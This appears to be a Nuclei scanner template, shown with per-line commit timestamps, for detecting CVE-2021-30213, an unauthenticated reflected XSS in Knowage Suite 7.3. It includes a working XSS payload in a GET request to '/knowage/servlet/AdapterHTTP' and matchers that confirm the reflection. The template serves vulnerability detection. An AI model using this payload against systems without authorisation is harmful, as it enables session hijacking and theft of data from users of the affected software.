2021-11-24 15:43:59 +00:00
id : CVE-2021-30213
info :
2022-08-29 13:55:23 +00:00
name : Knowage Suite 7.3 - Cross-Site Scripting
2021-11-24 15:43:59 +00:00
author : alph4byt3
severity : medium
2022-08-29 13:55:23 +00:00
description : Knowage Suite 7.3 contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can inject arbitrary web script in '/servlet/AdapterHTTP' via the 'targetService' parameter.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:09:01 +00:00
remediation : |
Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in Knowage Suite 7.3.
2022-04-22 10:38:41 +00:00
reference :
2022-05-17 09:18:12 +00:00
- https://github.com/piuppi/Proof-of-Concepts/blob/main/Engineering/XSS-KnowageSuite7-3_unauth.md
2022-08-29 13:55:23 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-30213
2024-01-29 17:11:14 +00:00
- https://github.com/piuppi/Proof-of-Concepts
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
2021-12-03 07:23:34 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-12-03 07:23:34 +00:00
cve-id : CVE-2021-30213
cwe-id : CWE-79
2024-01-29 17:11:14 +00:00
epss-score : 0.00106
epss-percentile : 0.42925
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:eng:knowage:7.3.0:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : eng
product : knowage
2024-01-14 09:21:50 +00:00
tags : cve2021,cve,xss,knowage,eng
2021-11-24 15:43:59 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-11-24 15:43:59 +00:00
- method : GET
path :
2021-12-03 07:23:01 +00:00
- "{{BaseURL}}/knowage/servlet/AdapterHTTP?Page=LoginPage&NEW_SESSION=TRUE&TargetService=%2Fknowage%2Fservlet%2FAdapterHTTP%3FPage%3DLoginPage%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2021-11-24 15:43:59 +00:00
matchers-condition : and
matchers :
- type : word
part : body
2021-12-03 07:23:01 +00:00
words :
- '</script><script>alert(document.domain)</script>'
2021-11-24 15:43:59 +00:00
- type : word
part : header
words :
- text/html
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200
2024-01-30 06:46:18 +00:00
# digest: 490a00463044022065f2159a6c6da30d475a971e280303eccdf375debc58d773b45a9b3b98b4c79b02206da6c522bbf2febb189b81fa1fb6dcb6a9c8d96e2572cf0e80e9ace292274222:922c64590222798bb761d5b6d8e72950